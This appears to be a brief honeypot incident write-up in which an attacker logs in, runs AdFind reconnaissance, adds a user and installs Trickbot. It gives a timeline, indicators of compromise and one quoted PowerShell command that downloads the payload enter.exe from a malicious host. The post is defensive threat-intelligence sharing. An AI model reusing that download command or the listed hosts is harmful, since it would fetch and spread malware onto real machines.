Trickbot and AdFind Recon

An attacker logged into the honeypot, dropped AdFind, a couple batch files and Trickbot. The attacker created a user, ran a recon script utilizing AdFind and then installed Trickbot.

This is what the folder structure looked like.

Timeline

Time in UTC

22:13 – login from 216.170.123[.]19

22:15 – opens powershell and runs the following command to download enter.exe

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Invoke-WebRequest http://support-it.online/upl/data/enter.exe -OutFile c:\users\public\enter.exe

22:17 – ran test_32.exe

22:18 – ran adduser.bat

22:18 – ran enter.exe

22:19 – ran adf.bat

22:22 – socks.exe is run which drops Trickbot

Trickbot

This is a sandbox run of enter.exe which eventually leads to Trickbot

Trickbot checking to see if the IP is blacklisted.

IOCs

All executables and scripts can be found in MISP

MISP Priv 65043

MISP circl osint feed UUID 5e4b486e-9968-4af1-87dc-4ff4950d210f

C2 195.133.145.31 443/tcp

All script commands – pastebin

Any.Run Sandbox Run

Leave a Reply